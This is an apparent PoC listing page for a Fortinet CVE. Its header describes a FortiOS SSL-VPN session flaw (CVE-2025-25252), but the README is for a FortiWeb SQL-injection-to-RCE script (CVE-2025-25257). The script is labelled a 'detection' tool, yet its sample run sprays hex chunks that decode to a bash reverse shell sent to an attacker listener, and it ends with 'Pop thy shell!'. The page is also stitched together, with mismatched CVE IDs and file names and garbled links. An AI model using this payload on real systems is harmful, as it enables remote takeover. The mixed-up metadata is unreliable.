CVE-2025-25252 PoC — Fortinet FortiOS SSL-VPN Code Issue Vulnerability

Source
Associated Vulnerability
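Title: Fortinet FortiOS SSL-VPN Code Issue Vulnerability (CVE-2025-25252)
Description: Fortinet FortiOS SSL-VPN is VPN software from Fortinet, a US company. Fortinet FortiOS SSL-VPN contains a code issue vulnerability that stems from insufficient session expiration, which may allow a remote attacker to reopen a session by reusing a SAML record. The following versions are affected: 7.6.0 through 7.6.2, 7.4.0 through 7.4.6, 7.2.0 through 7.2.10, 7.0.0 through 7.0.16, and all 6.4 versions.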
Description
CVE-2025-25252-POC
Readme
# watchTowr-vs-FortiWeb-CVE-2025-25257

Detection Artifact Generator for FortiWeb CVE-2025-25257


See our [blog post](https://labs.watchtowr.com/) for technical details.



https://github.com/user-attachments/assets/e59f2b3b-2b9b-469f-b4a8-2b7df2ede194



# Detection in Action

```
python watchTowr-vs-FortiWeb-CVE-2025-25257.py --target https://192.168.8.30/ --lhost 192.168.8.148 --lport 1350
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-FortiWeb-CVE-2025-25257.py

        (*) FortiWeb Unauthenticated SQLi to Remote Code Execution Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-25257]

[*] sprayed chunk #1/17:        '696d706f72'
[*] sprayed chunk #2/17:        '74206f733b'
[*] sprayed chunk #3/17:        '206f732e73'
[*] sprayed chunk #4/17:        '797374656d'
[*] sprayed chunk #5/17:        '2827626173'
[*] sprayed chunk #6/17:        '68202d6320'
[*] sprayed chunk #7/17:        '222f62696e'
[*] sprayed chunk #8/17:        '2f62617368'
[*] sprayed chunk #9/17:        '202d69203e'
[*] sprayed chunk #10/17:       '26202f6465'
[*] sprayed chunk #11/17:       '762f746370'
[*] sprayed chunk #12/17:       '2f3139322e'
[*] sprayed chunk #13/17:       '3136382e38'
[*] sprayed chunk #14/17:       '2e3134382f'
[*] sprayed chunk #15/17:       '3133353020'
[*] sprayed chunk #16/17:       '303e263122'
[*] sprayed chunk #17/17:       '2729'

[*] Pop thy shell!

```

# Description

This script attempts to detect whether FortiWeb is vulnerable to CVE-2025-25257.

# Affected Versions

The following versions of FortiWeb are affected:

| Version      | Affected             | Solution                   |
| ------------ | -------------------- | -------------------------- |
| FortiWeb 7.6 | 7.6.0 through 7.6.3  | Upgrade to 7.6.4 or above  |
| FortiWeb 7.4 | 7.4.0 through 7.4.7  | Upgrade to 7.4.8 or above  |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |

For more information, visit [FortiGuard Labs PSIRT](https://fortiguard.fortinet.com/psirt/FG-IR-25-151).


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research, follow the [watchTowr](https://watchTowr.com) Labs Team:

- https://jack.com/watchtowrcyber/tools
- https://one.gitcom/watchtowrcyber.labs/x



File Snapshot

```
[4.0K] /data/pocs/1b61d0f2764b3a911b1acbc4d868ab5d97ed6e22
├── [2.8K] README.md
└── [2.8K] watchTowr-vs-FortiWeb.py

1 directory, 2 files
```